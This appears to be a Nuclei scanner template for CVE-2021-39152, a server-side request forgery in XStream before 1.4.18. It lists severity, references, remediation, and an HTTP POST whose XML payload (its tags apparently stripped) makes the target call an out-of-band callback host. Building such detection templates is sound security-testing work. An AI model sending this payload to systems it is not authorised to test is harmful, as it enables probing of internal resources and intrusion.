id: CVE-2021-39152 info: name: XStream <1.4.18 - Server-Side Request Forgery author: pwnhxl severity: high description: | XStream before 1.4.18 is susceptible to server-side request forgery. An attacker can request data from internal resources that are not publicly available by manipulating the processed input stream with a Java runtime version 14 to 8. This makes it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site. remediation: | Upgrade XStream to version 1.4.18 or later to mitigate the vulnerability. reference: - https://x-stream.github.io/CVE-2021-39152.html - https://github.com/x-stream/xstream/security/advisories/GHSA-xw4p-crpj-vjx2 - https://security.netapp.com/advisory/ntap-20210923-0003/ - https://nvd.nist.gov/vuln/detail/cve-2021-39152 - https://lists.debian.org/debian-lts-announce/2021/09/msg00017.html classification: cvss-metrics: CVSS:3.1/AV:N/AC:H/PR:L/UI:N/S:C/C:H/I:H/A:H cvss-score: 8.5 cve-id: CVE-2021-39152 cwe-id: CWE-502 epss-score: 0.00668 epss-percentile: 0.77426 cpe: cpe:2.3:a:xstream_project:xstream:*:*:*:*:*:*:*:* metadata: max-request: 1 vendor: xstream_project product: xstream tags: cve,cve2021,xstream,ssrf,oast http: - raw: - | POST / HTTP/1.1 Host: {{Hostname}} Content-Type: application/xml http://{{interactsh-url}}/internal/ GBK 1111 b 0 0 http://{{interactsh-url}}/internal/ 1111 b 0 0 matchers-condition: and matchers: - type: word part: interactsh_protocol words: - "http" - type: word part: interactsh_request words: - "User-Agent: Java" # digest: 4b0a0048304602210081c57a4dd1cf33fa41196ea48ccf41dc59231be99f9d3a84a4cb3b820dd97f7d022100f5aba4992a27b8a0e23ed2fe5cc4a3a5e2d7c8455ea313640e8b998f0d0a584d:922c64590222798bb761d5b6d8e72950